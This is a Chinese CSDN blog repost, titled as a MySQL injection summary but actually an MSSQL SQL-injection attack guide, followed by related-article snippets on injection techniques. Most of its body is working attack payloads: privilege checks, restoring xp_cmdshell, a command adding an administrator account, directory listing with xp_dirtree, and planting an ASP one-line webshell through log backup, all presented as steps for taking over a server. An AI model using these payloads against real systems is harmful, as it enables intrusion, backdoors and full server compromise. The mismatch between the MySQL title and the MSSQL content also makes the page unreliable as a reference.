mysql数据库注入_MYSQL数据库注入总结

最新推荐文章于 2023-07-08 01:39:31 发布
最新推荐文章于 2023-07-08 01:39:31 发布
阅读量280 收藏
点赞数
文章标签: mysql数据库注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42554162/article/details/113187505
版权

MS SQL是指微软的SQL

Server数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。SQL

Server一开始并不是微软自己研发的产品,而是当时为了要和IBM竞争时,与Sybase合作所产生的,其最早的发展者是Sybase,同时微软也和Sybase合作过

SQL Server 4.2版本的研发,微软亦将SQL Server 4.2移植到Windows

NT(当时为3.1版),在与Sybase终止合作关系后,自力开发出SQL Server 6.0版,往后的SQL

Server即均由微软自行研发。

版本

年份

发布名称

代号

1.0

(OS/2)

1989年

SQL Server 1.0

-

4.21

(WinNT)

1993年

SQL Server 4.21

-

6.0

1995年

SQL Server 6.0

SQL95

6.5

1996年

SQL Server 6.5

Hydra

7.0

1998年

SQL Server 7.0

Sphinx

-

1999年

SQL Server 7.0

OLAP工具

Plato

8.0

2000年

SQL Server 2000

Shiloh

8.0

2003年

SQL Server 2000

64-bit 版本

Liberty

9.0

2005年

SQL Server 2005

Yukon

10.0

2008年

SQL Server 2008

Katmai

11.0

2010年

SQL Server 2010

Kilimanjaro

1:mssql注入点的基本检测

不管什么数据库攻击时都需要进行基本的检测 以确定后面的攻击方案

(1) 注入点类型判断

判断是否是mssql的数据库 语句提交:

And exists (select * from sysobjects)

页面返回正常为mssql注入点

(2) 注入点权限判断

再判断为mssql注入点后 那么进行权限判断 提交以下语句查询

And 1=(select

IS_srvrolemember(‘sysadmin’)) //判断是否是系统管理员权限

And 1=(select

IS_srvrolemember(‘db_owner’)) //判断是否是库权限

And 1=(select IS_srvrolemember(‘public

’)) //判断是否为Public权限(为低的权限)

以上任意一条执行成功也就是返回正常那么说是那个权限

现在来介绍下权限

Sa权限为最高也就是系统管理员权限 有了系统管理权限就相当于那个网站服务器已经在你手中了因为sa权限是系统管理员权限也就是你可以执行任何的CMD命令或者修改red注册表等攻击行为

(3) MSQL返回信息判断

在注入点提交:

And @@version>0

还是从页面返回的错误信息中.可以得到数据库的版本如果页面出错但未返回可利用的学习那么说明mssql关闭了错误信息提示.那么我们就不能进行暴库也就是爆密码出来在那

union select 联合查询.

还可以进行以下的查询检测.以获得跟多的关于mssql注入点信息

;declare @d

int //判断mssql支持多行语句查询

And (select count(1) from

[sysobjects])>=0 //是否支持子查询

And

user>0 //获取当前数据库用户名

And

db_name>0 //获取当前数据库名称

And 1=converr (int,db_name()) 或

1=(select

db_name()) //当前数据库名

And 1=(select

@@servername) //本地服务名

And 1=(select

has_dbaccess(‘master’)) //判断是否有库读写权限

2:利用mssql 扩展存储注入攻击

扩展存储过程是 mssql

提供的特殊功能所谓“扩展存储过程”,其实就是一个普通的windows系统dll文件按照某种规则实现了某些函数功能.mssql利用扩展存储可以实现许多强大的功能,包括对系统进行某种操作等

(1) 检测与恢复扩展存储

提交以下语句进行查询进行检测:

And 1=(select count(*) from master.dbo.sysobjects whrer xtype =

‘x’ and name = ‘xp_cmdshell’)

可以判断xm_cmdshell扩展存储是否存在.

And 1=(select count(*) from master.dbo.sysobjects where

name=’xp_regread’)

可查看xp_regread 扩展存储过程是否被删除

如果扩展存储被删除,可执行如下查询进行恢复

;exec sp_dropextendedproc ‘xp_cmdshell’

上面这条查询语句是在恢复前线删除xp_cmdshell , 以后再在后面进行创建,然后执行如下查询

;exec sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’

该语句是利用系统中默认的”xplog70.dll”文件,自动恢复xp_cmdshell

如果该语句执行不成功那么说明log70这个dll文件被删除了我们就可以上传一个”xplog70.dll”文件,然后进行恢复语句如下:

;exec sp_addextendedproc ‘xp_cmdshell’,’c:xplog70.dll’

(2) 攻击中最常利用的扩展存储

在sql注入攻击中.最常利用的扩展存储有如下几个

Xp_cmdshell---------利用此存储过程可以直接执行系统命令

Xp_regread ---------- 利用此存储过程可以进行注册表读取

Xp_regwrite----------利用此存储过程可以写入注册表

Xp_dirtree------------利用此存储过程可以进行列目录操作

Xp_enumdsn--------利用此存储过程可以进行odbc连接

Xp_loginconfig-----利用此存储过程可以进行配置服务器安全模式信息

Sa权限的扩展存储攻击利用方法

如果是判断为sa权限的话那么我们只需提交各种扩展存储查询语句就可以实现危害很大的攻击

1:xp_cmdshell扩展执行任意命令

利用xp_cmdshell课执行命令 比如提交

;exec master..xp_cmdshell ‘dir c:’

就可以列出c盘所有的目录

;exec master..xp_cmdshell ‘net user

bingdao bingdao /add &&net localgroup administrators

bingdao

/add’

就是在系统用户组内添加一个用户名和密码都是bingdao的用户并且将它加入到管理组里面 然后可以开启3389和修改端口号 不过一般都要看情况而定的

SA权限还有其他几种就不一一介绍了 在课件里也是有的《mssql_sa下常用和不常用提权操作大全.doc》

DB权限下的扩展的攻击利用

如果判断权限为db权限 虽然无法直接利用系统命令等进行直接攻击 所以攻击也会较为麻烦一点

当注入点为DB权限 那么我们可以考虑直接写入一句话但写入一句话的前提就是知道web物理路径列出web目录。然后利用sql语句创建一个临时表然后将这个一句话插入到这个临时表再进行备份

备份成asp文件就成功得到一个一句话后门了然后连接就OK了

1:判断数据库权限

And 1=(select is_member(‘db_owner’));--

这个语句和一开始的语句不怎么一样但是效果都是测试权限的

如果返回正常那么就是db权限 其实 啊D等工具就是这样判断的

2:查找web物理目录

如果我们用DB权限写入一句话是需要知道web目录

执行如下:

;create table

temp (dir nvarchar(255),depth varchar(255),files varchar(255),id

int not null identity (1,1));--

该语句可创建一个临时表一共4个字段,前三个字段用于存放执行存储过程xp_dirtree返回结果 ID字段则方便查询指定内容

再执行:

;insert into temp (dir,depth,files) exec master.dbo.xp_dirtree

‘c:’,1,1—

利用xp_dirtree 查询 将指定目录文件盒文件夹插入到临时表中

这里查询的是C盘目录 在进行如下查询

And (select dir from temp where id=1)>0

该句就是查询临时表中的内容,也就是指定的目录文件盒文件夹名,因为不能一次性获得所有的信息所以我们只能修改ID值就是修改id=..

依次列出文件夹和文件

通过这个比较麻烦的方法我们可以找到web目录路径

3:写入一句话木马

是在找到web目录后就可以写入一句话木马了

执行以下语句

;alter database XXXX set RECOVERY FULL

;backup log XXXX to disk = 'c:Sammy' with init

;create table cmd (a image)

;insert into cmd (a) values ('一句话')

;backup log XXXX to disk = 'c:xxx2.asp'

执行完毕就可以在指定web目录生存一个名为2.asp的后门文件用一句话木马客户端连接就可得到webshell 上面的xxxx是数据库

4:MSSQL注入猜解数据库技术

如果权限够那么我们就可以像上面那样直接提权或者DB写文件进去但如果我们权限不够那?那我们就得像access那样猜解管理员的表的字段,内容进入后台想办法拿webshell

1:having 与 group by 查询爆表名与字段名

Mssql注入点地址后面提交

Having 1=1—

就可从返回的错误信息中即可得到当前表名与第1个字段在继续提交以下代码

Group by 字段名1 having 1=1—

即可得到第2个字段名继续提交以下

Group by 字段名1,字段名2 having 1=1—

这样一直下去直到得到所有字段名

顾培
关注
【漏洞挖掘】——17、SSI漏洞介绍于挖掘(上)
Fly_鹏程万里
03-01 1115
(1)找注入点http://xx.xx.xx.xx:xxxx/?id=1 #显示内容 http://xx.xx.xx.xx:xxxx/?id=1 ' #无任何显示 (2)字段个数为3:http://xx.xx.xx.xx:xxxx/?id=1 ' order by 3 -- xx #显示正常 http://xx.xx.xx.xx:xxxx/?id=1 ' order by ...
mysql注入总结_mysql注入总结
weixin_39662432的博客
02-02 110
4.相关函数system_user() 系统用户名user() 用户名current_user 当前用户名session_user()连接数据库的用户名database() 数据库名version() MYSQL数据库版本load_file() MYSQL读取本地文件的函数@@datadir 读取数据库路径@@basedir MYSQL 安装路径@@version_compile_os 操作系统 ...
mysql手工注入imformation_SQL 注入总结
weixin_35125164的博客
02-08 220
0x01 什么是SQL注入sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。0x02 SQL注入的分类按变量类型分数字型字符型按HTTP提交方式分GET注入POST注入Cookie注入注入方式分报错注入盲注布尔盲注时间盲注union注入编码问题宽字节注入0x03识别后台数据库根据操作系统平台sql server:Windows(IIS)MySQL:Apach...
MySQL常用注入方式总结笔记
EC_Carrot的博客
11-10 1109
目录MySQL中的注释获取元数据UNION查询MySQL函数利用MySQL显错式注入宽字节注入MySQL长字符截断延迟注入 MySQL中的注释 MySQL支持以下三种注释风格: #:注释从"#"字符到行尾 --:注释从"--"序列到行尾。需要注意用此注释后面需要跟一个或多个空格。注:空格与tag都可以 /* */:注释从/*序列到后面*/序列中间的字符 其中,/* */注释有个特点,观察以下sql语句: select id/*!55555, username*/ from users 这句语句是能正常
SQL注入原理与实践(实验笔记)
weixin_52620919的博客
09-02 1381
什么是SQL注入? 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 我该如何向非技术人解释SQL注入? PHP基础语法 MySQL基础语法 Mysql创建表时反引号的作用 ...
Unity实现连接MySQL数据库.rar_MYSQL_unity_unity 3d_unity 数据库
09-20
在Unity中连接MySQL数据库是一项常见的需求,特别是在需要持久化存储游戏数据或实现网络功能时。MySQL是一种流行的开源关系型数据库管理系统,具有高性能、高可靠性和易用性。 要实现在Unity中连接MySQL数据库,...
MySQL.zip_java数据库查询_查询数据库
09-14
本项目聚焦于使用Java语言进行MySQL数据库的查询操作,这涉及到Java的JDBC(Java Database Connectivity)技术。 首先,Java通过JDBC API与MySQL进行交互。JDBC是Java平台的标准接口,它允许程序员用标准的SQL语句...
Mysql.rar_php class_php mysql_php 类_php数据库_php连接数据库
09-21
它提供了多种方式来与MySQL数据库进行交互,其中使用面向对象的方法是现代编程实践中常见的一种。这个"php_mysql_php 类"就是这样一个面向对象的数据库处理类,它封装了数据库连接、查询、更新等操作,使得代码更...
mysql.rar_MYSQL_python_python mysql_python数据库
09-21
本压缩包文件mysql.rar”包含了使用Python操作MySQL数据库的一些关键知识点。 首先,我们关注到“MySQLDB.py”,这通常是一个Python模块,它可能实现了Python与MySQL之间的连接和数据操作。MySQLDB是Python的一个...
mysql5.1.rar_MySQL数据库_C/C++_
08-12
MySQL 5.1是MySQL数据库管理系统的一个重要版本,它提供了高效、可靠且可扩展的数据存储解决方案。本参考资料主要面向C/C++开发者,他们可以利用MySQL 5.1进行后端数据处理和存储。以下是关于MySQL 5.1及C/C++编程的...
网络管理mysql实验总结_网络安全实验报告 第二章
weixin_28884205的博客
02-05 441
利用TCP协议实现synflood攻击运行syn攻击程序,以靶机为目标主机对其发送syn数据包,查看目标主机状态。利用xdos工具进行攻击首先在192.168.1.3的目标机器上打开wireshark,过滤出ip.dst=192.168.1.3的IP包。再在192.168.1.2的发动攻击的主机上输入命令:192.168.1.3 135 -t 3 -s 55.55.55.55。利用wireshar...
SQL注入MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2295
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
mssql注入mysql注入_MSSQL手工注入
weixin_36269652的博客
02-07 152
注入点屏蔽了and语句and 1=2没有报错,就用or语句。and (select count(*) from sysobjects)>0返回正常就是mssql数据库and 1=(select @@version)查看版本信息and 1=(select db_name())获取当前所在数据库名(对其他数据库没有权限)and 1=(select top 1 name from master.....
我们的成长之路——MySQL数据库基本手工注入总结
最新发布
weixin_63265626的博客
07-08 495
② 有些时候莫名其妙的就出错的时候(比如有数字显示位,而用替换函数(比如version())去替换时却返回空白页或报错),爆不出来的时候,可以尝试通过hex()或convert()等函数来解决可能的编码问题,比如hex(version())、unhex(hex(version()))、convert(version() using latin1)等等。如果你还不放心那就这样/*!④ and 1=2 union select 1,2,group_concat(列名1,0x3a,列名2),4 from 表名。
Mysql下可能存在注入的点。
weixin_30530523的博客
05-16 76
  总结mysql下可能存在注入的点,适用于mssql和oracle,先写语句,以后再写语句可能出现在哪些场景下:   针对查询:      select * from x where id=* select * from x where id='*'  针对删除:    delete from x where id=* delete from x where id...
安全测试===Mysql 注入技巧学习 MySQL注入技巧(1)
软件测试技术的博客
09-18 118
默认存在的数据库mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返回页面与原来相同) 共三种情况: 字符串类型查询时:数字类型查询时:登陆时: ' 假 '' 真 " 假 "" 真 \ 假 ...
【转】xp_dirtree储存过程漏洞
weixin_34381666的博客
05-26 1690
sql server 2000漏洞一直很多前段时间我自己的服务器就出现了一个sql的临时储存过程漏洞漏洞扩展:xp_dirtree储存过程 事前:最近发现一个漏洞是sql服务器造成的前几天正好没有什么事情,就用阿d的sql注入工具对自己服务器的网站进行注入,偶然发现了使用mssql的网站浸染可以利用sql注入的形式得到整个服务器上所有目录(我的服务器作了安全设置的)依然可以看见,然后在服务器上安...
SQL注射语句的经典总结
weixin_33798152的博客
04-27 107
SQL注射语句的经典总结 SQL注射语句 1.判断有无注入点 ' ; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) ---判断是否存在admin这张...
mssql提权总结
st3pby的博客
12-30 2746
mssql提权总结
MySQL SQL注入:information_schema数据库的利用与解析
接着,他们可以查询TABLES和COLUMNS表,找出mysql数据库中的表及其列,以便进一步利用SQL注入漏洞。 因此,对information_schema数据库的理解和有效利用对于防御者和攻击者都至关重要。防御者需要确保限制对这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值